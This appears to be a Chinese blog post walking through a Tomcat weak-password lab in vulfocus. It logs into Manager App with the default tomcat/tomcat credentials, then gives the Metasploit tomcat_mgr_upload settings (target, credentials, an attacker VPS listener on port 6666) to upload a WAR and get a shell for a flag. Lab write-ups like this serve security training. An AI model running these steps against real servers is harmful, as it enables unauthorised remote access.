tomcat弱口令

Zab Tomcat是Apache 软件基金会(Apache Software Foundation)的Jakarta 项目中的一个核心项目,由Apache、Sun 和其他一些公司及个人共同开发而成。 通过弱口令登录后台,部署war包geshell。

漏洞编号:

影响版本:
弱口令

复现步骤:
1,打开漏洞环境vulfocus

2,访问URL点击Manager App

3,验证弱口令,输入默认账号密码tomcat tomcat

4,使用msf进入exploit/multi/http/tomcat_mgr_upload模块

5,依次设置

set rhost vulfocus.fofa.so set rport 60231 set httpusername tomcat set httppassword tomcat set lhost VPS IP set lport 6666

6,run

7,查看flag

想了解更多关于tomcat弱口令的内容,请扫微信
或微信搜索jiemingpan

本文链接:http://www.soufuzi.com/jianzhan/2308

(0)
上一篇 2024-07-19 23:06:40
下一篇 2024-07-19 23:06:40

相关推荐

  • 美国DOT认证:DOT认证制造商职责

    什么是美国dot认证? dot, 是美国交通部 (us department of transportation) 的英文缩写。美国交通部成立于1967年,总部位于华盛顿,下设联邦公路管理局(fhwa)、联邦航空管理局(faa)、联邦机动车安全管理局(fmcsa), 海运管理局(marad)、全国公路交通安全管理局(nhtsa), 总检察官办公室(ost)等部门。 dot认证制造厂商职责证明,各机动车辆和设备项目完全依从相适应的fmvsss的最小执行要

    2025-04-18 08:45:13
  • 快团团团购怎么设置?快团团复制已有团购

    有三类用户都可以来使用快团团 第一:用户它属于供应商或者是品牌方这一类客户呢,他是有货源没有顾客的,比如说像实体店或者某一个牌子的品牌方入驻 第二:是推手。推手呢,是指的是有顾客无货无货源,比如说我们的一些宝妈群体,实际上他来了之后呢,就会成为我们这个体系里面的帮卖, 第三:就是零售商既有货源又有顾客,比如说有一些淘宝店还有些自媒体,也是我们平台做的比较大的两类人群。

    2023-02-18 12:38:25